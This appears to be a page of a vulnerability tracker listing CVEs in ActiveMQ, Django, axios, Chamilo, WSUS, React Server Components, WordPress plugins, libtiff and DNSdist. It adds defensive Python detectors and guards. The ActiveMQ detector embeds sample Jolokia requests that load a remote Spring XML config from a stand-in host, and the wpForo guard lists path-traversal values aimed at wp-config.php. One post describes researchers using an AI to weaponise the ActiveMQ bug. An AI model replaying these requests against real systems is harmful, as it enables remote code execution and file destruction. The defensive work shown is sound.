
Overview

  • Apache Software Foundation
  • Apache ActiveMQ Broker
  • org.apache.activemq:activemq-broker

07 Apr 2026
Published
08 Apr 2026
Updated

CVSS
Pending
EPSS
5.60%

KEV

Description

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ. Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery URI whose VM transport brokerConfig parameter loads a remote Spring XML application context through ResourceXmlApplicationContext. Because ResourceXmlApplicationContext instantiates all singleton beans before BrokerService validates the configuration, arbitrary code executes in the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker, Apache ActiveMQ All and Apache ActiveMQ: before 5.19.4, and from 6.0.0 before 6.2.3. Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
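The description above gives the shape of the abuse: a Jolokia exec request against an org.apache.activemq:* MBean, operation addNetworkConnector or addConnector, whose argument carries a vm:// URI with a brokerConfig parameter pointing at a remote Spring XML file. The following is an added example (Python, not Apache or ActiveMQ code) that classifies Jolokia requests as a reverse proxy or WAF would see them. It handles both the POST JSON form and the GET path form, including Jolokia's '!' escape for slashes inside arguments, so an encoded GET variant is not missed. The sample requests, the 203.0.113.5 host and the "xbean:http://" spelling of the brokerConfig value are constructed for illustration; only the endpoint, MBean domain and operation names come from the advisory.

```python
import json
import re
from urllib.parse import unquote

# Identifiers below come from the advisory text; every sample request is constructed.
JOLOKIA_PREFIX = "/api/jolokia/"
ACTIVEMQ_DOMAIN = "org.apache.activemq:"
CONNECTOR_OPS = {"addNetworkConnector", "addConnector"}
# Verdicts in increasing order of severity.
VERDICTS = ["not-jolokia", "benign", "activemq-exec", "connector-add", "remote-brokerConfig"]


def split_jolokia_path(rest):
    """Split a Jolokia GET path on '/', honouring its '!' escape ('!/' is a literal slash, '!!' a bang)."""
    parts, cur, i = [], [], 0
    while i < len(rest):
        ch = rest[i]
        if ch == "!" and i + 1 < len(rest):
            cur.append(rest[i + 1])
            i += 2
            continue
        if ch == "/":
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    parts.append("".join(cur))
    return parts


def parse_requests(method, target, body=None):
    """Normalise one HTTP request into a list of Jolokia request dicts (empty if not Jolokia)."""
    path = unquote(target.split("?", 1)[0])          # drop a real query string, then percent-decode
    if not path.startswith(JOLOKIA_PREFIX):
        return []
    if method.upper() == "POST" and body:
        try:
            data = json.loads(body)
        except ValueError:
            return []
        return data if isinstance(data, list) else [data]   # Jolokia also accepts bulk arrays
    # GET form: /api/jolokia/<type>/<mbean>/<operation>/<arg1>/<arg2>...
    segs = split_jolokia_path(path[len(JOLOKIA_PREFIX):])
    if len(segs) < 2:
        return []
    req = {"type": segs[0], "mbean": segs[1]}
    if len(segs) > 2:
        req["operation"] = segs[2]
        req["arguments"] = segs[3:]
    return [req]


def assess_one(req):
    """Classify a single Jolokia request dict against the advisory's abuse pattern."""
    if req.get("type") != "exec" or not str(req.get("mbean", "")).startswith(ACTIVEMQ_DOMAIN):
        return "benign"
    if req.get("operation") not in CONNECTOR_OPS:
        return "activemq-exec"
    args = " ".join(str(a) for a in req.get("arguments") or [])
    # A brokerConfig parameter that points at a remote resource is the code-execution path
    # described above (the exact "xbean:http://" spelling is an assumption of this example).
    if re.search(r"brokerConfig=\S*?(https?|ftp)://", args, re.IGNORECASE):
        return "remote-brokerConfig"
    return "connector-add"


def assess(method, target, body=None):
    """Most severe verdict for the request; a bulk POST is judged by its worst element."""
    reqs = parse_requests(method, target, body)
    if not reqs:
        return "not-jolokia"
    return max((assess_one(r) for r in reqs), key=VERDICTS.index)


# Constructed samples; 203.0.113.5 is an RFC 5737 documentation address.
SAMPLES = [
    ("GET", "/api/jolokia/read/java.lang:type=Memory/HeapMemoryUsage", None),
    ("POST", "/api/jolokia/", json.dumps({
        "type": "exec",
        "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
        "operation": "addNetworkConnector",
        "arguments": ["static:(vm://x?brokerConfig=xbean:http://203.0.113.5/beans.xml)"]})),
    # Same request in GET form: '!/' escapes the slashes and %3F hides the '?' from the query parser.
    ("GET", "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost"
            "/addConnector/vm:!/!/x%3FbrokerConfig=xbean:http:!/!/203.0.113.5!/beans.xml", None),
    ("GET", "/api/jolokia/exec/org.apache.activemq:type=Broker,brokerName=localhost"
            "/addConnector/tcp:!/!/0.0.0.0:61617", None),
]

if __name__ == "__main__":
    for method, target, body in SAMPLES:
        print(f"{assess(method, target, body):<20} {method} {target}")
```

Run it over proxy logs that record request bodies, not just paths, or the POST form is invisible. An administrator adding a plain tcp:// listener through the console scores connector-add; anything carrying a remote brokerConfig is the code-execution path and warrants an alert. Denying exec on those two operations in the Jolokia access policy closes the path on brokers that cannot be upgraded immediately; the fix is 5.19.4 or 6.2.3.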

Statistics

  • 1 Post

Last activity: 21 hours ago

Fediverse

A 13-year-old ActiveMQ RCE bug (CVE-2026-34197) was discovered and weaponized in minutes by researchers using AI, specifically Claude, highlighting the potential of AI in exploit-building. The vulnerability, which allowed arbitrary system command execution through the Jolokia API, has been fixed in newer versions of ActiveMQ Classic.
csoonline.com/article/4157146/


Overview

  • djangoproject
  • Django
  • django

05 Nov 2025
Published
26 Feb 2026
Updated

CVSS
Pending
EPSS
0.58%

KEV

Description

An issue was discovered in Django 5.1 before 5.1.14, 4.2 before 4.2.26, and 5.2 before 5.2.8. The methods `QuerySet.filter()`, `QuerySet.exclude()`, and `QuerySet.get()`, and the class `Q()`, are subject to SQL injection when a suitably crafted dictionary is passed, with dictionary expansion, as the `_connector` argument. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank cyberstan for reporting this issue.
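The reachable pattern is code that expands an untrusted mapping straight into the ORM, such as `Model.objects.filter(**request.GET.dict())`: a parameter named `_connector` is then delivered to `Q()` as a keyword-only control argument rather than as a field lookup. The following is an added example (not Django's code and not a payload; the advisory shows none) of the guard a view should apply before expansion. The `Article`-style field and lookup allow-lists are constructed for illustration.

```python
# Added example, not Django code: build filter kwargs from an untrusted mapping.
# The field and lookup allow-lists are constructed for an imagined Article model.
ALLOWED_FIELDS = {"title", "status", "author__username"}
ALLOWED_LOOKUPS = {"exact", "iexact", "icontains", "in"}


class UnsafeFilterKey(ValueError):
    """Raised when an untrusted key must not reach QuerySet.filter() / Q()."""


def build_filter_kwargs(params, allowed_fields=ALLOWED_FIELDS, allowed_lookups=ALLOWED_LOOKUPS):
    """Return a dict that is safe to expand into Model.objects.filter(**kwargs).

    Keys starting with '_' are rejected unconditionally: Q(*args, **kwargs) takes
    '_connector' and '_negated' as keyword-only control arguments, so a request
    parameter with that name is not a field lookup at all. Every other key must be
    an allow-listed field, optionally followed by one allow-listed lookup.
    """
    safe = {}
    for key, value in params.items():
        if not isinstance(key, str) or key.startswith("_"):
            raise UnsafeFilterKey(f"control argument rejected: {key!r}")
        if key in allowed_fields:
            safe[key] = value
            continue
        field, sep, lookup = key.rpartition("__")
        if not sep or field not in allowed_fields or lookup not in allowed_lookups:
            raise UnsafeFilterKey(f"filter key rejected: {key!r}")
        safe[key] = value
    return safe


def filter_kwargs_or_none(params):
    """Non-raising wrapper for view code: None means 'refuse the request'."""
    try:
        return build_filter_kwargs(params)
    except UnsafeFilterKey:
        return None


if __name__ == "__main__":
    # Constructed inputs; the second mimics request.GET.dict() from a crafted query string.
    print(build_filter_kwargs({"title__icontains": "quic", "status": "published"}))
    print(filter_kwargs_or_none({"title": "x", "_connector": "x"}))
```

The allow-list is the real control; the underscore rule is the cheap backstop that also covers `_negated` and any future control argument. Upgrading to 4.2.26, 5.1.14 or 5.2.8 fixes the ORM side, but views that forward raw query parameters into `filter()` remain a poor idea regardless.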

Statistics

  • 1 Post

Last activity: 21 hours ago

Bluesky

GitHub - omarkurt/django-connector-CVE-2025-64459-testbed: A self-contained testbed for Django CVE-2025-64459. Demonstrates QuerySet.filter() parameter injection via dictionary expansion using Docker.

Overview

  • axios
  • axios

09 Apr 2026
Published
09 Apr 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
0.02%

KEV

Description

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0.
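The defect class is a host-string comparison performed before normalisation. The following is an added example in Python (not axios code; the naive matcher illustrates the bug class and is not a transcription of the pre-1.15.0 source) that runs the same hostnames through two matchers: one compares the string as written, the other canonicalises both sides first (trailing dot stripped, case folded, IPv6 brackets removed, IP literals reduced to canonical text), so `localhost.`, `LOCALHOST`, `[::1]` and `0:0:0:0:0:0:0:1` all land on the NO_PROXY rule. The NO_PROXY value is constructed for the example.

```python
import ipaddress

# Constructed example policy: keep loopback and an internal domain off the proxy.
NO_PROXY = "localhost,127.0.0.1,::1,.internal.example"


def _entries(no_proxy):
    return [e.strip() for e in no_proxy.split(",") if e.strip()]


def naive_no_proxy_match(host, no_proxy=NO_PROXY):
    """Illustrates the bug class: compares the hostname exactly as the caller wrote it."""
    for entry in _entries(no_proxy):
        if entry == "*" or host == entry or (entry.startswith(".") and host.endswith(entry)):
            return True
    return False


def normalize_host(host):
    """Canonical form of a hostname or IP literal for policy comparison."""
    h = host.strip().lower().rstrip(".")            # 'localhost.' -> 'localhost'
    if h.startswith("[") and h.endswith("]"):       # '[::1]' -> '::1'
        h = h[1:-1]
    try:
        h = ipaddress.ip_address(h).compressed      # '0:0:0:0:0:0:0:1' -> '::1'
    except ValueError:
        pass                                        # not an IP literal; keep the name
    return h


def no_proxy_match(host, no_proxy=NO_PROXY):
    """Hardened matcher: both sides are normalised, and a name rule covers its subdomains."""
    target = normalize_host(host)
    for entry in _entries(no_proxy):
        if entry == "*":
            return True
        rule = normalize_host(entry.lstrip("."))
        if target == rule or target.endswith("." + rule):
            return True
    return False


def route(host, no_proxy=NO_PROXY, matcher=no_proxy_match):
    """'direct' if the host is exempt from the proxy, else 'proxy'."""
    return "direct" if matcher(host, no_proxy) else "proxy"


if __name__ == "__main__":
    for h in ["localhost", "localhost.", "[::1]", "0:0:0:0:0:0:0:1",
              "LOCALHOST", "api.internal.example", "example.com"]:
        print(f"{h:<18} naive={route(h, matcher=naive_no_proxy_match):<7} hardened={route(h)}")
```

Normalising the rule side matters as much as the request side: an operator who writes `::1` or `[::1]` in NO_PROXY should get the same result. Port suffixes and CIDR entries are deliberately out of scope here.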

Statistics

  • 1 Post

Last activity: 22 hours ago

Bluesky

🚨 New CRITICAL CVE detected in AWS Lambda 🚨 CVE-2025-62718 impacts axios in 4 Lambda base images. Details: https://github.com/aws/aws-lambda-base-images/issues/465 More: https://lambdawatchdog.com/ #AWS #Lambda #CVE #CloudSecurity #Serverless

Overview

  • chamilo
  • chamilo-lms

10 Apr 2026
Published
10 Apr 2026
Updated

CVSS v4.0
CRITICAL (9.3)
EPSS
Pending

KEV

Description

Chamilo LMS is a learning management system. Prior to 1.11.38, a chained attack can enable otherwise-blocked PHP code from the main/install/ directory and allow an unauthenticated attacker to modify existing files or create new files where allowed by system permissions. This only affects portals with the main/install/ directory still present and read-accessible. This vulnerability is fixed in 1.11.38.

Statistics

  • 1 Post

Last activity: 5 hours ago

Fediverse

🔔 CVE-2026-33698: Chamilo LMS (<1.11.38) has a CRITICAL flaw — exposed install/ dir lets unauth attackers execute PHP & modify files. Upgrade to 1.11.38+ & restrict install/ directory access now! Details: radar.offseq.com/threat/cve-20


Overview

  • Microsoft
  • Windows Server 2012

14 Oct 2025
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
75.75%

Description

Deserialization of untrusted data in Windows Server Update Service allows an unauthorized attacker to execute code over a network.

Statistics

  • 1 Post

Last activity: 21 hours ago

Bluesky

Weekly Purple Team Episode: CVE-2025-59287 - Exploiting & Detecting the Critical WSUS RCE

Overview

  • Meta
  • react-server-dom-webpack

03 Dec 2025
Published
26 Feb 2026
Updated

CVSS v3.1
CRITICAL (10.0)
EPSS
86.09%

Description

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

Statistics

  • 1 Post

Last activity: 4 hours ago

Bluesky

React2Shell: 766 servers compromised in 24 hours, the race to patch is on 📌 Link to the article: www.redhotcyber.com/post/react2s... By Bajram Zeqiri #redhotcyber #news #ciberattacchi #cybersecurity #hacking #malware #vulnerabilita #react2shell #cve202555182

Overview

  • SaturdayDrive
  • Ninja Forms - File Uploads

07 Apr 2026
Published
08 Apr 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.07%

KEV

Description

The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27.

Statistics

  • 1 Post

Last activity: 19 hours ago

Fediverse

Overview

  • libtiff

25 Jan 2024
Published
09 Apr 2026
Updated

CVSS
Pending
EPSS
0.74%

KEV

Description

A segmentation fault (SEGV) flaw was found in libtiff that could be triggered by passing a crafted TIFF file to the TIFFReadRGBATileExt() API. This flaw allows a remote attacker to cause a heap-buffer overflow, leading to a denial of service.

Statistics

  • 1 Post

Last activity: 15 hours ago

Bluesky

libtiff CVE-2023-52356 crashes apps with a single malicious TIFF. Still unpatched on many Rocky/Ubuntu/SUSE boxes. Read more: 👉 tinyurl.com/2sphv8h8 #RockyLinux

Overview

  • tomdever
  • wpForo Forum

11 Apr 2026
Published
11 Apr 2026
Updated

CVSS v3.1
HIGH (7.1)
EPSS
Pending

KEV

Description

The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.
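The step that turns a poisoned postmeta value into a deletion is the one the description names: wpforo_fix_upload_dir() rewrites legitimate upload paths and returns everything else unchanged, so no containment check stands between the stored value and wp_delete_file(). The following is an added example in Python (not wpForo or WordPress code) of the check that belongs there: resolve the stored reference against the upload root and refuse unless the real path lies strictly inside it. The upload root and the sample references are constructed.

```python
import os

# Constructed upload root; the real one depends on the WordPress install.
UPLOAD_DIR = "/var/www/html/wp-content/uploads/wpforo"


def resolve_inside(base_dir, fileurl):
    """Resolve a stored attachment reference against base_dir.

    Returns the real path only if it lies strictly inside base_dir; otherwise None.
    An empty value, an absolute path elsewhere, '..' traversal and symlinks that
    escape the root all fail closed instead of reaching the unlink call.
    """
    if not fileurl or not isinstance(fileurl, str):
        return None
    base = os.path.realpath(base_dir)
    if os.path.isabs(fileurl):
        candidate = os.path.realpath(fileurl)
    else:
        candidate = os.path.realpath(os.path.join(base, fileurl))
    try:
        if os.path.commonpath([base, candidate]) != base or candidate == base:
            return None
    except ValueError:          # e.g. paths on different drives on Windows
        return None
    return candidate


def delete_attachment(base_dir, fileurl):
    """Unlink the attachment only after the containment check passes; True on delete."""
    path = resolve_inside(base_dir, fileurl)
    if path is None or not os.path.isfile(path):
        return False
    os.remove(path)
    return True


if __name__ == "__main__":
    # Constructed stored values; the last two are what the description's data[body][fileurl] abuse stores.
    for ref in ["2026/04/report.pdf", "2026/../2025/x.png",
                "../../../wp-config.php", "/var/www/html/wp-config.php"]:
        print(f"{ref:<32} -> {resolve_inside(UPLOAD_DIR, ref)}")
```

The check is deliberately applied to the value read back from the database, not only at write time, because the description's first step is exactly that a write-side filter let an array through. Until a fixed release is available, the advice in the post below (restrict file permissions, watch topic_edit requests carrying wpftcf_delete) is the practical mitigation.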

Statistics

  • 1 Post

Last activity: 1 hour ago

Fediverse

🛡️ CVE-2026-5809: HIGH severity vuln in wpForo Forum plugin ≤3.0.2 lets subscriber+ users delete arbitrary files (e.g., wp-config.php). No patch yet — restrict permissions & monitor topic edits for abuse. radar.offseq.com/threat/cve-20


Overview

  • PowerDNS
  • DNSdist
  • dnsdist

31 Mar 2026
Published
31 Mar 2026
Updated

CVSS v3.1
MEDIUM (5.3)
EPSS
0.02%

KEV

Description

An attacker might be able to trick DNSdist into allocating too much memory while processing DNS over QUIC or DNS over HTTP/3 payloads, resulting in a denial of service. In setups with a large quantity of memory available this usually results in an exception and the QUIC connection is properly closed, but in some cases the system might enter an out-of-memory state instead and terminate the process.

Statistics

  • 1 Post

Last activity: 23 hours ago

Bluesky

🚨 #DNS admins: A single crafted QUIC packet can crash your load balancer (CVE-2026-24030). Patch or mitigate now. Here’s the 60-second iptables fix → tinyurl.com/47b2f936 #Fedora
Showing 11 to 20 of 37 CVEs